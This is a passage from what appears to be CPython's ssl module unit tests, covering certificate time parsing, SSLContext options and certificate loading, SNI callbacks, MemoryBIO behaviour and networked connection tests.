self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
